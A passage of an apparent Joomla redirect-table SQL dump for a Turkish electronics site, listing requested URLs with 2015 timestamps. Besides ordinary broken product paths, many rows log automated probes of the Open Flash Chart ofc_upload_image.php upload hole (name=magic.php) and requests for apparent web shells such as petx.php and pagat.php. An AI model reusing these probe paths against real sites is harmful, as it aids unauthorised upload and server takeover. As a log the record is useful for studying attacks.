00:13:11','0000-00-00 00:00:00',301),(6962,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',10,0,'2015-01-16 12:01:37','0000-00-00 00:00:00',301),(6963,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',3,0,'2015-01-16 12:25:32','0000-00-00 00:00:00',301),(6964,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',2,0,'2015-01-16 14:43:48','0000-00-00 00:00:00',301),(6965,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123','','','',1,0,'2015-01-16 15:12:36','0000-00-00 00:00:00',301),(6966,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',3,0,'2015-01-16 20:14:41','0000-00-00 00:00:00',301),(6967,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','','','',1,0,'2015-01-16 23:01:33','0000-00-00 00:00:00',301),(6968,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/images/stories/petx.php?baca','','','',2,0,'2015-01-17 05:41:34','0000-00-00 00:00:00',301),(6969,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/images/stories/explore.php?baca','','','',2,0,'2015-01-17 05:41:36','0000-00-00 00:00:00',301),(6970,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/images/stories/magic.php.png','','','',2,0,'2015-01-17 05:41:57','0000-00-00 00:00:00',301),(6971,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/images/stories/magic.php.png?baca','','','',2,0,'2015-01-17 05:41:58','0000-00-00 00:00:00',301),(6972,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',126,0,'2015-01-17 23:26:31','0000-00-00 00:00:00',301),(6973,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:36','0000-00-00 00:00:00',301),(6974,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:36','0000-00-00 00:00:00',301),(6975,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:37','0000-00-00 00:00:00',301),(6976,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:38','0000-00-00 00:00:00',301),(6977,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:38','0000-00-00 00:00:00',301),(6978,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:39','0000-00-00 00:00:00',301),(6979,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:40','0000-00-00 00:00:00',301),(6980,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:40','0000-00-00 00:00:00',301),(6981,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:41','0000-00-00 00:00:00',301),(6982,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:41','0000-00-00 00:00:00',301),(6983,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:42','0000-00-00 00:00:00',301),(6984,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:43','0000-00-00 00:00:00',301),(6985,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:43','0000-00-00 00:00:00',301),(6986,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:44','0000-00-00 00:00:00',301),(6987,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:45','0000-00-00 00:00:00',301),(6988,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:46','0000-00-00 00:00:00',301),(6989,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:46','0000-00-00 00:00:00',301),(6990,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:47','0000-00-00 00:00:00',301),(6991,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:48','0000-00-00 00:00:00',301),(6992,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:48','0000-00-00 00:00:00',301),(6993,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:49','0000-00-00 00:00:00',301),(6994,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:49','0000-00-00 00:00:00',301),(6995,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2015-01-17 23:26:50','0000-00-00 00:00:00',301),(6996,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2015-01-17 23:26:51','0000-00-00 00:00:00',301),(6997,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&limitstart=10&lang=en','','','',18,0,'2015-01-18 10:04:28','0000-00-00 00:00:00',301),(6998,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',11,0,'2015-01-18 20:42:22','0000-00-00 00:00:00',301),(6999,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-01-20 07:33:23','0000-00-00 00:00:00',301),(7000,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',1,0,'2015-01-20 18:02:16','0000-00-00 00:00:00',301),(7001,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2015-01-21 12:36:46','0000-00-00 00:00:00',301),(7002,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',3,0,'2015-01-21 12:36:48','0000-00-00 00:00:00',301),(7003,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',3,0,'2015-01-21 12:36:54','0000-00-00 00:00:00',301),(7004,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/images/stories/pagat.php?rf','','','',1,0,'2015-01-22 13:44:06','0000-00-00 00:00:00',301),(7005,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',89,0,'2015-01-23 09:11:54','0000-00-00 00:00:00',301),(7006,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',24,0,'2015-01-23 12:50:47','0000-00-00 00:00:00',301),(7007,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',24,0,'2015-01-23 12:50:47','0000-00-00 00:00:00',301),(7008,'http://3s-technologies.com.tr/index.php/en/?Itemid=109&id=98&lang=en&option=com_content&view=article','','','',7,0,'2015-01-25 11:16:27','0000-00-00 00:00:00',301),(7009,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/','','','',1,0,'2015-01-26 08:33:52','0000-00-00 00:00:00',301),(7010,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler','','','',1,0,'2015-01-26 08:33:53','0000-00-00 00:00:00',301),(7011,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/hakk-m-zda','','','',1,0,'2015-01-26 08:33:56','0000-00-00 00:00:00',301),(7012,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/iletisim','','','',1,0,'2015-01-26 08:33:57','0000-00-00 00:00:00',301),(7013,'http://www.3s-technologies.com.tr/index.php/tr/index.php/en/','','','',1,0,'2015-01-26 08:33:58','0000-00-00 00:00:00',301),(7014,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/thru-hole','','','',1,0,'2015-01-26 08:33:59','0000-00-00 00:00:00',301),(7015,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/smd-ultra-hız','','','',1,0,'2015-01-26 08:34:01','0000-00-00 00:00:00',301),(7016,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/smd-orta-hızlı','','','',1,0,'2015-01-26 08:34:03','0000-00-00 00:00:00',301),(7017,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/smd-düşük-hızlı','','','',1,0,'2015-01-26 08:34:05','0000-00-00 00:00:00',301),(7018,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/screen-printer','','','',1,0,'2015-01-26 08:34:10','0000-00-00 00:00:00',301),(7019,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/smd-fırın','','','',1,0,'2015-01-26 08:34:19','0000-00-00 00:00:00',301),(7020,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/dalga-lehim','','','',1,0,'2015-01-26 08:34:22','0000-00-00 00:00:00',301),(7021,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/bölgesel-lehimleme','','','',1,0,'2015-01-26 08:34:24','0000-00-00 00:00:00',301),(7022,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/temizleme-makineleri','','','',1,0,'2015-01-26 08:34:25','0000-00-00 00:00:00',301),(7023,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/konveyorler','','','',1,0,'2015-01-26 08:34:25','0000-00-00 00:00:00',301),(7024,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/lehimleme-malzemeleri','','','',1,0,'2015-01-26 08:34:29','0000-00-00 00:00:00',301),(7025,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/çubuk-lehim','','','',1,0,'2015-01-26 08:34:33','0000-00-00 00:00:00',301),(7026,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/tel-lehim','','','',1,0,'2015-01-26 08:34:35','0000-00-00 00:00:00',301),(7027,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/krem-lehim','','','',1,0,'2015-01-26 08:34:36','0000-00-00 00:00:00',301),(7028,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/flux','','','',1,0,'2015-01-26 08:34:37','0000-00-00 00:00:00',301),(7029,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/kursunsuz-lehim','','','',1,0,'2015-01-26 08:34:37','0000-00-00 00:00:00',301),(7030,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/dalga-lehimleme','','','',1,0,'2015-01-26 08:34:38','0000-00-00 00:00:00',301),(7031,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/kart-ueretim-teknolojileri','','','',1,0,'2015-01-26 08:34:38','0000-00-00 00:00:00',301),(7032,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/aqueous','','','',1,0,'2015-01-26 08:34:39','0000-00-00 00:00:00',301),(7033,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/ddm-novastar','','','',1,0,'2015-01-26 08:34:39','0000-00-00 00:00:00',301),(7034,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/kester','','','',1,0,'2015-01-26 08:34:40','0000-00-00 00:00:00',301),(7035,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/mirae','','','',1,0,'2015-01-26 08:34:40','0000-00-00 00:00:00',301),(7036,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/panasonic','','','',1,0,'2015-01-26 08:34:41','0000-00-00 00:00:00',301),(7037,'http://www.3s-technologies.com.tr/index.php/tr/index.php/tr/ueruenler/manufacturers/tolo','','','',1,0,'2015-01-26 08:34:41','0000-00-00 00:00:00',301),(7038,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/','','','',1,0,'2015-01-26 08:37:39','0000-00-00 00:00:00',301),(7039,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler','','','',1,0,'2015-01-26 08:37:39','0000-00-00 00:00:00',301),(7040,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/hakk-m-zda','','','',1,0,'2015-01-26 08:37:40','0000-00-00 00:00:00',301),(7041,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/iletisim','','','',1,0,'2015-01-26 08:37:41','0000-00-00 00:00:00',301),(7042,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/en/about-us','','','',1,0,'2015-01-26 08:37:41','0000-00-00 00:00:00',301),(7043,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/thru-hole','','','',1,0,'2015-01-26 08:37:42','0000-00-00 00:00:00',301),(7044,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/smd-ultra-hız','','','',1,0,'2015-01-26 08:37:43','0000-00-00 00:00:00',301),(7045,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/smd-orta-hızlı','','','',1,0,'2015-01-26 08:37:44','0000-00-00 00:00:00',301),(7046,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/smd-düşük-hızlı','','','',1,0,'2015-01-26 08:37:45','0000-00-00 00:00:00',301),(7047,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/screen-printer','','','',1,0,'2015-01-26 08:37:46','0000-00-00 00:00:00',301),(7048,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/smd-fırın','','','',1,0,'2015-01-26 08:37:48','0000-00-00 00:00:00',301),(7049,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/dalga-lehim','','','',1,0,'2015-01-26 08:37:50','0000-00-00 00:00:00',301),(7050,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/bölgesel-lehimleme','','','',1,0,'2015-01-26 08:37:51','0000-00-00 00:00:00',301),(7051,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/temizleme-makineleri','','','',1,0,'2015-01-26 08:37:52','0000-00-00 00:00:00',301),(7052,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/konveyorler','','','',1,0,'2015-01-26 08:38:00','0000-00-00 00:00:00',301),(7053,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/lehimleme-malzemeleri','','','',1,0,'2015-01-26 08:38:11','0000-00-00 00:00:00',301),(7054,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/çubuk-lehim','','','',1,0,'2015-01-26 08:38:11','0000-00-00 00:00:00',301),(7055,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/tel-lehim','','','',1,0,'2015-01-26 08:38:12','0000-00-00 00:00:00',301),(7056,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/krem-lehim','','','',1,0,'2015-01-26 08:38:13','0000-00-00 00:00:00',301),(7057,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/flux','','','',1,0,'2015-01-26 08:38:13','0000-00-00 00:00:00',301),(7058,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/kursunsuz-lehim','','','',1,0,'2015-01-26 08:38:14','0000-00-00 00:00:00',301),(7059,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/dalga-lehimleme','','','',1,0,'2015-01-26 08:38:14','0000-00-00 00:00:00',301),(7060,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/kart-ueretim-teknolojileri','','','',1,0,'2015-01-26 08:38:15','0000-00-00 00:00:00',301),(7061,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/aqueous','','','',1,0,'2015-01-26 08:38:16','0000-00-00 00:00:00',301),(7062,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/ddm-novastar','','','',1,0,'2015-01-26 08:38:16','0000-00-00 00:00:00',301),(7063,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/kester','','','',1,0,'2015-01-26 08:38:17','0000-00-00 00:00:00',301),(7064,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/mirae','','','',1,0,'2015-01-26 08:38:18','0000-00-00 00:00:00',301),(7065,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/panasonic','','','',1,0,'2015-01-26 08:38:18','0000-00-00 00:00:00',301),(7066,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda/index.php/tr/ueruenler/manufacturers/tolo','','','',1,0,'2015-01-26 08:38:19','0000-00-00 00:00:00',301),(7067,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/','','','',1,0,'2015-01-26 08:40:28','0000-00-00 00:00:00',301),(7068,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products','','','',1,0,'2015-01-26 08:40:28','0000-00-00 00:00:00',301),(7069,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/about-us','','','',1,0,'2015-01-26 08:40:29','0000-00-00 00:00:00',301),(7070,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/contacts-en','','','',1,0,'2015-01-26 08:40:29','0000-00-00 00:00:00',301),(7071,'http://www.3s-technologies.com.tr/index.php/en/index.php/tr/','','','',1,0,'2015-01-26 08:40:30','0000-00-00 00:00:00',301),(7072,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/thru-hole','','','',1,0,'2015-01-26 08:40:30','0000-00-00 00:00:00',301),(7073,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/smd-ultra-hız','','','',1,0,'2015-01-26 08:40:31','0000-00-00 00:00:00',301),(7074,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/smd-orta-hızlı','','','',1,0,'2015-01-26 08:40:32','0000-00-00 00:00:00',301),(7075,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/smd-düşük-hızlı','','','',1,0,'2015-01-26 08:40:32','0000-00-00 00:00:00',301),(7076,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/screen-printer','','','',1,0,'2015-01-26 08:40:32','0000-00-00 00:00:00',301),(7077,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/smd-fırın','','','',1,0,'2015-01-26 08:40:33','0000-00-00 00:00:00',301),(7078,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/dalga-lehim','','','',1,0,'2015-01-26 08:40:33','0000-00-00 00:00:00',301),(7079,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/bölgesel-lehimleme','','','',1,0,'2015-01-26 08:40:34','0000-00-00 00:00:00',301),(7080,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/temizleme-makineleri','','','',1,0,'2015-01-26 08:40:39','0000-00-00 00:00:00',301),(7081,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/konveyorler','','','',1,0,'2015-01-26 08:40:40','0000-00-00 00:00:00',301),(7082,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/lehimleme-malzemeleri','','','',1,0,'2015-01-26 08:40:43','0000-00-00 00:00:00',301),(7083,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/çubuk-lehim','','','',1,0,'2015-01-26 08:40:43','0000-00-00 00:00:00',301),(7084,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/tel-lehim','','','',1,0,'2015-01-26 08:40:44','0000-00-00 00:00:00',301),(7085,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/krem-lehim','','','',1,0,'2015-01-26 08:40:45','0000-00-00 00:00:00',301),(7086,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/flux','','','',1,0,'2015-01-26 08:40:45','0000-00-00 00:00:00',301),(7087,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/lead-free-solder','','','',1,0,'2015-01-26 08:40:46','0000-00-00 00:00:00',301),(7088,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/wave-soldering','','','',1,0,'2015-01-26 08:40:46','0000-00-00 00:00:00',301),(7089,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/pcb-productions-methods','','','',1,0,'2015-01-26 08:40:47','0000-00-00 00:00:00',301),(7090,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/aqueous','','','',1,0,'2015-01-26 08:40:47','0000-00-00 00:00:00',301),(7091,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/ddm-novastar','','','',1,0,'2015-01-26 08:40:48','0000-00-00 00:00:00',301),(7092,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/kester','','','',1,0,'2015-01-26 08:40:48','0000-00-00 00:00:00',301),(7093,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/mirae','','','',1,0,'2015-01-26 08:40:49','0000-00-00 00:00:00',301),(7094,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/panasonic','','','',1,0,'2015-01-26 08:40:49','0000-00-00 00:00:00',301),(7095,'http://www.3s-technologies.com.tr/index.php/en/index.php/en/products/manufacturers/tolo','','','',1,0,'2015-01-26 08:40:50','0000-00-00 00:00:00',301),(7096,'http://3s-technologies.com.tr/index.php/en/?Itemid=50&id=1&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2015-01-27 05:27:51','0000-00-00 00:00:00',301),(7097,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list&amp;sa=U&amp;ei=L_rIVL2JC7DIsQTkkoCABQ&amp;ved=0COYBEBYwKTjIAQ&amp;usg=AFQjCNE3WfFTC65rg171EvRlr5U9OfEgmA/admin','','','',1,0,'2015-01-28 18:14:04','0000-00-00 00:00:00',301),(7098,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-category-list&amp;sa=U&amp;ei=L_rIVL2JC7DIsQTkkoCABQ&amp;ved=0COYBEBYwKTjIAQ&amp;usg=AFQjCNE3WfFTC65rg171EvRlr5U9OfEgmA/compo','','','',1,0,'2015-01-28 18:14:12','0000-00-00 00:00:00',301),(7099,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:26','0000-00-00 00:00:00',301),(7100,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:27','0000-00-00 00:00:00',301),(7101,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:27','0000-00-00 00:00:00',301),(7102,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:28','0000-00-00 00:00:00',301),(7103,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:29','0000-00-00 00:00:00',301),(7104,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:29','0000-00-00 00:00:00',301),(7105,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:30','0000-00-00 00:00:00',301),(7106,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:30','0000-00-00 00:00:00',301),(7107,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:31','0000-00-00 00:00:00',301),(7108,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 18:14:31','0000-00-00 00:00:00',301),(7109,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-28 18:14:32','0000-00-00 00:00:00',301),(7110,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-28 